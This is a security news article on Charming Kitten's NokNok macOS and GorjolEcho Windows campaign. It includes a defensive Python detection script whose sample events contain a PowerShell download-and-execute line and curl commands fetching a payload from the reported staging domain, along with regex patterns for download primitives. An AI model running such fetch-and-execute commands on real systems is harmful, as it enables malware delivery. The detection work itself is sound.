
Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems.

The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group.

Charming Kitten is also known as APT35 or Phosphorus and has launched at least 30 operations in 14 countries since 2015, according to Mandiant.

Google has linked the threat actor to the Iranian state, and more specifically to the Islamic Revolutionary Guard Corps (IRGC).

In September 2022, the U.S. government managed to identify and charge members of the threat group.

Proofpoint reports that the threat actor has now abandoned the macro-based infection methods involving laced Word documents and instead deploys LNK files to load their payloads.

Regarding the phishing lures and social engineering methods seen in the campaign, the hackers posed as nuclear experts from the U.S. and approached targets with an offer to review drafts on foreign policy topics.

Email sampled from the latest Charming Kitten campaign (Proofpoint)

In many cases, the attackers insert other personas in the conversation to add a sense of legitimacy and establish a rapport with the target.

Second email from another fake persona (Proofpoint)

Charming Kitten’s impersonation of real people and use of fake personas in phishing attacks has been documented before, as has its use of ‘sock puppets’ to create realistic conversation threads.

Attacks on Windows

After gaining the target’s trust, Charming Kitten sends a malicious link that contains a Google Script macro, redirecting the victim to a Dropbox URL.

This external source hosts a password-protected RAR archive with a malware dropper that leverages PowerShell code and an LNK file to stage the malware from a cloud hosting provider.

The final payload is GorjolEcho, a simple backdoor that accepts and executes commands from its remote operators.

To avoid raising suspicion, GorjolEcho will open a PDF with a topic relevant to the discussion the attackers had with the target previously.

GorjolEcho infection chain (Proofpoint)

Attacks on macOS

If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app.

Follow-up email sent to macOS users (Proofpoint)
Fake RUSI VPN site dropping the NokNok malware (Proofpoint)

When the AppleScript file in the archive is executed, a curl command fetches the NokNok payload and establishes a backdoor on the victim’s system.

NokNok infection chain (Proofpoint)

NokNok generates a system identifier and then uses four bash script modules to set persistence, establish communication with the command and control (C2) server, and exfiltrate data to it.

NokNok modules (Proofpoint)

The NokNok malware gathers system information that includes the version of the OS, running processes, and installed applications.

NokNok encrypts all collected data, encodes it in the base64 format, and exfiltrates it.
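The two infection chains above share a detectable shape on the endpoint: on Windows, a double-clicked LNK runs under explorer.exe and spawns PowerShell that reaches out to a cloud host; on macOS, the AppleScript in the ZIP shells out to curl to fetch NokNok. The script below is an added example written for this article, not code from Proofpoint or from the malware, and it runs simple process-lineage rules over constructed sample events. Its assumptions: the event field names are a loose stand-in for EDR process-creation records, the AppleScript is assumed to execute under osascript (the report does not state the parent process), and the PowerShell stage is assumed to use the usual download primitives (the report only says PowerShell code stages the malware from a cloud provider). The only indicator taken from the report is the staging domain library-store[.]camdvr[.]org; the URL path in the sample event is a placeholder.

```python
"""Process-lineage detection for the LNK/PowerShell and AppleScript/curl chains.

Sample events below are constructed for illustration, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    event_id: int
    host_os: str      # "windows" or "macos"
    parent: str       # parent image basename (assumed field)
    image: str        # process image basename (assumed field)
    cmdline: str      # full command line (assumed field)


# Staging host named in the Proofpoint report, defanged as on the page; refanged for matching.
NOKNOK_HOST = "library-store[.]camdvr[.]org".replace("[.]", ".")

# Assumption: the PowerShell stager uses common web-download primitives or a literal URL.
POWERSHELL_DOWNLOAD = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|https?://)",
    re.IGNORECASE,
)


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, event_id) pairs for every event that matches a rule."""
    findings: List[Tuple[str, int]] = []
    for e in events:
        img, par, cmd = e.image.lower(), e.parent.lower(), e.cmdline
        # Rule 1 (Windows chain): LNK launched from explorer.exe -> PowerShell that downloads.
        if (e.host_os == "windows" and par == "explorer.exe"
                and img in ("powershell.exe", "pwsh.exe")
                and POWERSHELL_DOWNLOAD.search(cmd)):
            findings.append(("lnk_powershell_download", e.event_id))
        # Rule 2 (macOS chain): AppleScript shelling out to curl.
        # Assumption: the script runs under osascript, giving osascript -> curl.
        if e.host_os == "macos" and par == "osascript" and img == "curl":
            findings.append(("applescript_curl", e.event_id))
        # Rule 3: any process, on any OS, referencing the reported staging host.
        if NOKNOK_HOST in cmd.lower():
            findings.append(("noknok_host", e.event_id))
    return findings


# Constructed sample events: two benign, three matching the chains described above.
SAMPLE_EVENTS = [
    ProcEvent(1, "windows", "explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://cloud-host.invalid/stage')\""),
    ProcEvent(2, "windows", "explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),            # benign
    ProcEvent(3, "macos", "osascript", "curl",
              "curl -sL https://library-store.camdvr.org/PLACEHOLDER_PATH -o /tmp/payload"),
    ProcEvent(4, "macos", "zsh", "curl", "curl -I https://www.apple.com"),  # benign
    ProcEvent(5, "macos", "launchd", "curl",
              "curl -s https://library-store.camdvr.org/PLACEHOLDER_PATH"),
]


def run_sample() -> List[Tuple[str, int]]:
    """Run the rules over the constructed events."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, eid in run_sample():
        print(f"{rule}: event {eid}")
```

Rules 1 and 2 key on parent-child lineage rather than on any indicator, so they keep firing when the group rotates hosting; rule 3 is the narrow indicator match and is expected to age out as infrastructure changes.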

Proofpoint also mentions that NokNok might feature more specific espionage-related functionality through other unseen modules.

The suspicion is based on code similarities to GhostEcho, previously analyzed by Check Point.

That backdoor featured modules that allowed taking screenshots, command execution, and cleaning the infection trail. It is likely that NokNok has these functions too.

Overall, this campaign shows that Charming Kitten is highly adaptable and capable of targeting macOS systems when necessary, and it highlights the growing threat that sophisticated malware campaigns pose to macOS users.
